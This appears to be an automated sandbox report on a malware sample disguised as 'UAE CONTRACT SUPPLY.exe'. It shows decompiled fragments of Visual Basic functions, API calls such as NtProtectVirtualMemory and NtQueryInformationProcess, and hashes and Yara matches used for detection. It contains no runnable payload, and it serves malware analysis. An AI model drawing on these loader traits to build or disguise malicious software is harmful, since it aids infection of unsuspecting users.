                                                          C-Code - Quality: 63%
                                                          			E0041255A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr* _v56;
				signed int _v60;
				char* _t33;
				signed int _t36;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				L00401210();
				_v16 = _t47;
				_v12 = 0x401128;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401216, _t44);
				if( *0x414010 != 0) {
					_v56 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v56 = 0x414010;
				}
				_t33 =  &_v36;
				L004012E8();
				_v40 = _t33;
				_t36 =  *((intOrPtr*)( *_v40 + 0x1bc))(_v40, _t33,  *((intOrPtr*)( *((intOrPtr*)( *_v56)) + 0x344))( *_v56));
				asm("fclex");
				_v44 = _t36;
				if(_v44 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x404e10);
					_push(_v40);
					_push(_v44);
					L00401324();
					_v60 = _t36;
				}
				L004012E2();
				asm("wait");
				_push(0x412633);
				return _t36;
			}
















                                                          0x0041255d
                                                          0x0041256c
                                                          0x00412576
                                                          0x0041257e
                                                          0x00412581
                                                          0x00412588
                                                          0x00412597
                                                          0x004125a1
                                                          0x004125bb
                                                          0x004125a3
                                                          0x004125a3
                                                          0x004125a8
                                                          0x004125ad
                                                          0x004125b2
                                                          0x004125b2
                                                          0x004125d6
                                                          0x004125da
                                                          0x004125df
                                                          0x004125ea
                                                          0x004125f0
                                                          0x004125f2
                                                          0x004125f9
                                                          0x00412615
                                                          0x004125fb
                                                          0x004125fb
                                                          0x00412600
                                                          0x00412605
                                                          0x00412608
                                                          0x0041260b
                                                          0x00412610
                                                          0x00412610
                                                          0x0041261c
                                                          0x00412621
                                                          0x00412622
                                                          0x00000000

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412576
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010,?,?,?,?,00401216), ref: 004125AD
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 004125DA
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,000001BC), ref: 0041260B
                                                          • __vbaFreeObj.MSVBVM60 ref: 0041261C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$CheckChkstkFreeHresultNew2
                                                          • String ID:
                                                          • API String ID: 4127847336-0
                                                          • Opcode ID: 00cf5ab5ae95c47ee0921c377f65e170713f2563b10032f9074a1cc1674503e5
                                                          • Instruction ID: 79997448ba687f8635e107bf463e3e762e12c528fe6750142f69099f15167c13
                                                          • Opcode Fuzzy Hash: 00cf5ab5ae95c47ee0921c377f65e170713f2563b10032f9074a1cc1674503e5
                                                          • Instruction Fuzzy Hash: 90210970941208EFCB10DF95DA89BDDBBF5BB48704F20446AF501FB2A1C7B95990DB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004129C8, Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 63%
                                                          			E004129C8(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr* _v56;
				signed int _v60;
				char* _t33;
				signed int _t36;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				L00401210();
				_v16 = _t47;
				_v12 = 0x401168;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401216, _t44);
				if( *0x414010 != 0) {
					_v56 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v56 = 0x414010;
				}
				_t33 =  &_v36;
				L004012E8();
				_v40 = _t33;
				_t36 =  *((intOrPtr*)( *_v40 + 0x1ac))(_v40, _t33,  *((intOrPtr*)( *((intOrPtr*)( *_v56)) + 0x374))( *_v56));
				asm("fclex");
				_v44 = _t36;
				if(_v44 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x1ac);
					_push(0x404e10);
					_push(_v40);
					_push(_v44);
					L00401324();
					_v60 = _t36;
				}
				L004012E2();
				asm("wait");
				_push(0x412aa1);
				return _t36;
			}
















                                                          0x004129cb
                                                          0x004129da
                                                          0x004129e4
                                                          0x004129ec
                                                          0x004129ef
                                                          0x004129f6
                                                          0x00412a05
                                                          0x00412a0f
                                                          0x00412a29
                                                          0x00412a11
                                                          0x00412a11
                                                          0x00412a16
                                                          0x00412a1b
                                                          0x00412a20
                                                          0x00412a20
                                                          0x00412a44
                                                          0x00412a48
                                                          0x00412a4d
                                                          0x00412a58
                                                          0x00412a5e
                                                          0x00412a60
                                                          0x00412a67
                                                          0x00412a83
                                                          0x00412a69
                                                          0x00412a69
                                                          0x00412a6e
                                                          0x00412a73
                                                          0x00412a76
                                                          0x00412a79
                                                          0x00412a7e
                                                          0x00412a7e
                                                          0x00412a8a
                                                          0x00412a8f
                                                          0x00412a90
                                                          0x00000000

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 004129E4
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010,?,?,?,?,00401216), ref: 00412A1B
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00412A48
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,000001AC), ref: 00412A79
                                                          • __vbaFreeObj.MSVBVM60 ref: 00412A8A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$CheckChkstkFreeHresultNew2
                                                          • String ID:
                                                          • API String ID: 4127847336-0
                                                          • Opcode ID: 5f92f61247118e4dd45f448438045a359818e655765973a054a0914365ba40c6
                                                          • Instruction ID: 5ece9c3066b5b4f4e9b4093e50402a65ccb324e4a20ae4ec3d421ec79e6498c3
                                                          • Opcode Fuzzy Hash: 5f92f61247118e4dd45f448438045a359818e655765973a054a0914365ba40c6
                                                          • Instruction Fuzzy Hash: 40212570A41208AFCB10DF91D989BCDBBB5AF48744F2044AAF101BB2A0C7B99990CB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00411034, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 65%
                                                          			E00411034(intOrPtr* _a4) {
				void* _v3;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct HWND__* _v68;
				signed int _v72;
				signed int _v84;
				intOrPtr _v397355967;
				signed int _t30;
				intOrPtr* _t32;
				void* _t33;
				void* _t35;
				void* _t38;
				void* _t39;
				intOrPtr _t41;

				 *[fs:0x0] = _t41;
				L00401210();
				_v16 = _t41;
				_v12 = E004010D8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, _t38, _t39, _t33, 0x3c,  *[fs:0x0], 0x401216);
				_t30 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v68);
				asm("fclex");
				_v72 = _t30;
				if(_v72 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x404a64);
					_push(_a4);
					_push(_v72);
					L00401324();
					_v84 = _t30;
				}
				HideCaret(_v68);
				L0040131E();
				_push(0);
				_t32 =  *0x0040CD14();
				asm("aam 0xa");
				 *_t32 =  *_t32 + _t32;
				_v397355967 = _v397355967 + _t35;
				goto ( *((intOrPtr*)(_t39 - 0x77)));
			}


















                                                          0x00411046
                                                          0x00411050
                                                          0x00411058
                                                          0x0041105b
                                                          0x00411062
                                                          0x00411071
                                                          0x00411080
                                                          0x00411083
                                                          0x00411085
                                                          0x0041108c
                                                          0x004110a5
                                                          0x0041108e
                                                          0x0041108e
                                                          0x00411090
                                                          0x00411095
                                                          0x00411098
                                                          0x0041109b
                                                          0x004110a0
                                                          0x004110a0
                                                          0x004110ac
                                                          0x004110b1
                                                          0x004110bb
                                                          0x004110c3
                                                          0x004110c6
                                                          0x004110c8
                                                          0x004110ca
                                                          0x004110d3

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 00411050
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,004010D8,00404A64,00000058), ref: 0041109B
                                                          • HideCaret.USER32(?), ref: 004110AC
                                                          • __vbaSetSystemError.MSVBVM60(?,00000000,004010D8,00404A64,00000058), ref: 004110B1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$CaretCheckChkstkErrorHideHresultSystem
                                                          • String ID:
                                                          • API String ID: 2881382524-0
                                                          • Opcode ID: cbd90c8c00c17ef8a9c5b938963a8fb1cd699bd13e8b24f8be04606bd53721b7
                                                          • Instruction ID: 4f2a27c482a07de47d0ed83d36f4159cab06591296ed00fe88fb7271741bcfc0
                                                          • Opcode Fuzzy Hash: cbd90c8c00c17ef8a9c5b938963a8fb1cd699bd13e8b24f8be04606bd53721b7
                                                          • Instruction Fuzzy Hash: AA113670940288EFEB11EFA5C809B8DBFB4EF48745F10806AF844BB5A1D37999458B49
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: UAE CONTRACT SUPPLY.exe PID: 6952 Parent PID: 6848 UAE CONTRACT SUPPLY.exeCOMMON

                                                          Executed Functions

                                                          Function 00566266, Relevance: 1.6, APIs: 1, Instructions: 125nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 005665DA
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: e01c8b38166cd1c3882caf2bcf227c181336954dfc3421f2232ef4963903f195
                                                          • Instruction ID: b06a7da1dfcb8934429ebbb818f8e4e1aed12a47dd491838f2cf065bb37c6bad
                                                          • Opcode Fuzzy Hash: e01c8b38166cd1c3882caf2bcf227c181336954dfc3421f2232ef4963903f195
                                                          • Instruction Fuzzy Hash: B4412630644306CEDF285928D6B43F52F92BF613A8FB59B2ECD8387590D72488C8DA02
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0056629C, Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0b96ac244b5475f630d3dad9b59a12b1c4c6ecf3356468d58545025444cce6f8
                                                          • Instruction ID: 755e2c4ba88d844038561d4af65e08110d66e26d7393590d96fe226f30fba347
                                                          • Opcode Fuzzy Hash: 0b96ac244b5475f630d3dad9b59a12b1c4c6ecf3356468d58545025444cce6f8
                                                          • Instruction Fuzzy Hash: EC416836345706CEDF249E24D5A47F83F61FF513A4FA94E6ECD9387591C7218884CA02
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0056626E, Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 835f7ae6b92223f474ae9016dbad54541db486ba9db6bd04c4023ab9fdd8bd4a
                                                          • Instruction ID: e9e3d35eca1317f8c39f2e57b481d01f1b13082440010dc12a7062d47665cce8
                                                          • Opcode Fuzzy Hash: 835f7ae6b92223f474ae9016dbad54541db486ba9db6bd04c4023ab9fdd8bd4a
                                                          • Instruction Fuzzy Hash: FE412535645706CEDF289A24D5B47F43F61FF613A8FA94A6ECD83875A0D7358C84CA02
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005662EA, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 71079ba16aa554b6b98f3c6128eaa23f4bcbc0ee06e60bbbb8778faecd680801
                                                          • Instruction ID: fa93df47ff43cda6648888e8020b885680b7531c771852cbe7c329f8b2b5631d
                                                          • Opcode Fuzzy Hash: 71079ba16aa554b6b98f3c6128eaa23f4bcbc0ee06e60bbbb8778faecd680801
                                                          • Instruction Fuzzy Hash: 59416B36645742CFDF249E14D5A4BA53F60FF62394FA98A6ECC938B691C7319C84CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005662C5, Relevance: 1.6, APIs: 1, Instructions: 113nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 005665DA
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: ba6ff2d2c9c00034da07b041c571ef8448d83bc70235202caff04aa7a88fa02a
                                                          • Instruction ID: 4c4187c27619c891a7114407c0f783e8b1a1f0005e1d10678d67a425e7e059cb
                                                          • Opcode Fuzzy Hash: ba6ff2d2c9c00034da07b041c571ef8448d83bc70235202caff04aa7a88fa02a
                                                          • Instruction Fuzzy Hash: BE315735245746CEDF285A24D5B47F52F61FF613A8FA98B6ECC8387691D7218C84CB02
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00566335, Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 005665DA
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: c9681b51fd7e9ae028c9d35c742f2118059842774e82f64b490e18024646fcd9
                                                          • Instruction ID: 6804aaa94e87276ebec971061b749502771bc30865cc67bf5b57d883458645a2
                                                          • Opcode Fuzzy Hash: c9681b51fd7e9ae028c9d35c742f2118059842774e82f64b490e18024646fcd9
                                                          • Instruction Fuzzy Hash: 1F315831245706CEDF285E24D5A47F52F61FF613A4FA98B6ECD8387590D7318C84CA02
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005663AA, Relevance: 1.6, APIs: 1, Instructions: 101nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 005665DA
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 10c3f90506049bc06731264a38e30552fa78df9a6b3dfc68711287b44cb0cb2d
                                                          • Instruction ID: 811ebecf08f226dcf5016acde871d903fd370e07a5e87d9eac6205ded270febc
                                                          • Opcode Fuzzy Hash: 10c3f90506049bc06731264a38e30552fa78df9a6b3dfc68711287b44cb0cb2d
                                                          • Instruction Fuzzy Hash: 5A317A36645752CFDB248F24D5A47A43F60FF523A4FA98BADC853879A1CB309C81CB02
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005663A0, Relevance: 1.6, APIs: 1, Instructions: 92nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 005665DA
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 0a5e128085d988632e82376b7833346f65438cd6b70314cc198d4672cda5fa77
                                                          • Instruction ID: 304aab11f095c19cce2c5e7287acdeb18c17db29613726c26c1ca0c08e938575
                                                          • Opcode Fuzzy Hash: 0a5e128085d988632e82376b7833346f65438cd6b70314cc198d4672cda5fa77
                                                          • Instruction Fuzzy Hash: B231F630245306CEDF285A24D6A47F52F61FF613A9FA59B5ECD83875A0D7348CC8CA42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00566455, Relevance: 1.6, APIs: 1, Instructions: 89nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 005665DA
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: cfbbbae9b0e32a3c286f6a8c759ba522c7d0fe47ec715c3d50cba1e8339ba53d
                                                          • Instruction ID: 492511cfe044379a230661de5948b344d1c6ee9ed3451a3c5c22f22e5249fc69
                                                          • Opcode Fuzzy Hash: cfbbbae9b0e32a3c286f6a8c759ba522c7d0fe47ec715c3d50cba1e8339ba53d
                                                          • Instruction Fuzzy Hash: 51319037645B52CEEB249B14D5A4BA43F61FF523A4FA987ADC853474E6CB3198C0CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005663F8, Relevance: 1.6, APIs: 1, Instructions: 88nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 005665DA
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 1c85740602a0265d1bdac12adb073c6500d29e97ba621cab6d743b6fee433da6
                                                          • Instruction ID: b6c1ea48fb32a4ad3c15efa5a8e2a7331866d58c0cd381074af17cf7ab0ec168
                                                          • Opcode Fuzzy Hash: 1c85740602a0265d1bdac12adb073c6500d29e97ba621cab6d743b6fee433da6
                                                          • Instruction Fuzzy Hash: 6C313435641716CEDF289A24D9A87E43F61FF613A5FA9875EC893875A0C7308CC5CA02
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0056641E, Relevance: 1.6, APIs: 1, Instructions: 87nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 005665DA
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 18c93c8d29343b16d6d388fec572bf83f90b4c47b15a6e53e77ce1594b32db5a
                                                          • Instruction ID: 0b26aae26623cacbb68cb10f32fcbbbafedebdaf1a7a95c350b003b738984909
                                                          • Opcode Fuzzy Hash: 18c93c8d29343b16d6d388fec572bf83f90b4c47b15a6e53e77ce1594b32db5a
                                                          • Instruction Fuzzy Hash: 36319C31640706CEDF249A24D9A47F43F61FF213A4FA9976DC993474E1DB3188C4CA01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005664A4, Relevance: 1.6, APIs: 1, Instructions: 83nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 005665DA
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 1a056a305f7630a5d6353fd9b803c3da42c2e7310dd26ac040ea8115d4684f61
                                                          • Instruction ID: 4d02e636ea3cc2cf11296a55e81dbc2eaa657f6405cf9c07a22d75f6f3b9718f
                                                          • Opcode Fuzzy Hash: 1a056a305f7630a5d6353fd9b803c3da42c2e7310dd26ac040ea8115d4684f61
                                                          • Instruction Fuzzy Hash: EB315F36645756CFDB20DB24E9947A83F61FF523A4FA987ADC863474A5C7318881CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00566566, Relevance: 1.6, APIs: 1, Instructions: 80nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 005665DA
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 3091a9b15157456b057fcfaf467f903250b94ab808deb17b4c4b3b98daa346a6
                                                          • Instruction ID: b37d69d3c7d9e1d725eb5cd0dbb0c5871d51f2ee39eb1aa48781b8808378ce6b
                                                          • Opcode Fuzzy Hash: 3091a9b15157456b057fcfaf467f903250b94ab808deb17b4c4b3b98daa346a6
                                                          • Instruction Fuzzy Hash: A2219937501B96CED724CB64E4957A43F60FF223A8F9887ADC4634B466CB319880CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005664FB, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 005665DA
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: acfef639b1b3e42313a70a80d2b89a630932bcc6477a91ddadf9f4dcd8de515b
                                                          • Instruction ID: 34ae728dfcbe6b5e1b5513d50f3e7450f677869547dfe94434abb0fd4ebb3cd8
                                                          • Opcode Fuzzy Hash: acfef639b1b3e42313a70a80d2b89a630932bcc6477a91ddadf9f4dcd8de515b
                                                          • Instruction Fuzzy Hash: 11113A36641716CEDB34DA14E6997A43B61FF213A8F99C79DC9534B465D73088C0CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00566629, Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 005665DA
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 40de0f6dac1e9e0573e505965286efae9057e1de2bbef8c1a9a7a24c63570f74
                                                          • Instruction ID: d45be31b217c5699956ac5b24aaacfcbc079b9f8893b06e5f2e6340b2564569b
                                                          • Opcode Fuzzy Hash: 40de0f6dac1e9e0573e505965286efae9057e1de2bbef8c1a9a7a24c63570f74
                                                          • Instruction Fuzzy Hash: 51017D11118695CED71AEAB8C4683E47F11BE113487AC87AEC5828F415E7238896C701
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00565DCB, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,005659A1,00000040,005625D9,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00565DE7
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 1a155810a22f01022b9ea00a1d1ffd2a4b442d4a1895ad0ce2269ed9328d8c95
                                                          • Instruction ID: 1a918c5dbcb631d46d2b4d3bcfa31f5d6a87c909f2f8e7ba83832509e4c605d7
                                                          • Opcode Fuzzy Hash: 1a155810a22f01022b9ea00a1d1ffd2a4b442d4a1895ad0ce2269ed9328d8c95
                                                          • Instruction Fuzzy Hash: 02C012E02240002E68048A28CD48C2BB2AA96E9B28B90C32CB872A22CCC930EC048032
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E509660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.519670757.000000001E4A0000.00000040.00000001.sdmp, Offset: 1E4A0000, based on PE: true
                                                          • Associated: 00000003.00000002.519823197.000000001E5BB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 0caf772ff5eecc159dbca326b47b2325d210f6f5a702ed3e3aa6906b081449b2
                                                          • Instruction ID: 4031f35e61a61c4f302f70fdb885791a9da1cbb7e2f3a73b9a0a8bf019253af6
                                                          • Opcode Fuzzy Hash: 0caf772ff5eecc159dbca326b47b2325d210f6f5a702ed3e3aa6906b081449b2
                                                          • Instruction Fuzzy Hash: EC90027124101802E180725A440464E048557D1746FD1C515E1015A14DCA558A9977E2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E5096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.519670757.000000001E4A0000.00000040.00000001.sdmp, Offset: 1E4A0000, based on PE: true
                                                          • Associated: 00000003.00000002.519823197.000000001E5BB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 78cb82cb2aec25b2549d1e5898f7857f70b969cbd2828b34c135e3ab74819e5e
                                                          • Instruction ID: ecd29250ab8b60e3012787c4e4e1c3191ecad3f874c2330a1ea2a45db722a9d7
                                                          • Opcode Fuzzy Hash: 78cb82cb2aec25b2549d1e5898f7857f70b969cbd2828b34c135e3ab74819e5e
                                                          • Instruction Fuzzy Hash: AD90027124109802E110725A840474E048557D0746F95C911E5414A18D86D588D17262
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E509710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.519670757.000000001E4A0000.00000040.00000001.sdmp, Offset: 1E4A0000, based on PE: true
                                                          • Associated: 00000003.00000002.519823197.000000001E5BB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: caa07ade8564c2212a73eb83cec26b93f2a3f6b5791553d649d5a16e63ea8771
                                                          • Instruction ID: 4e304ebf682d128d8a7334e026fedfa7aad11c4ae6a48a416cfe0b0915217004
                                                          • Opcode Fuzzy Hash: caa07ade8564c2212a73eb83cec26b93f2a3f6b5791553d649d5a16e63ea8771
                                                          • Instruction Fuzzy Hash: 2590027124101402E100769A540864A048557E0746F91D511E6014915EC6A588D17272
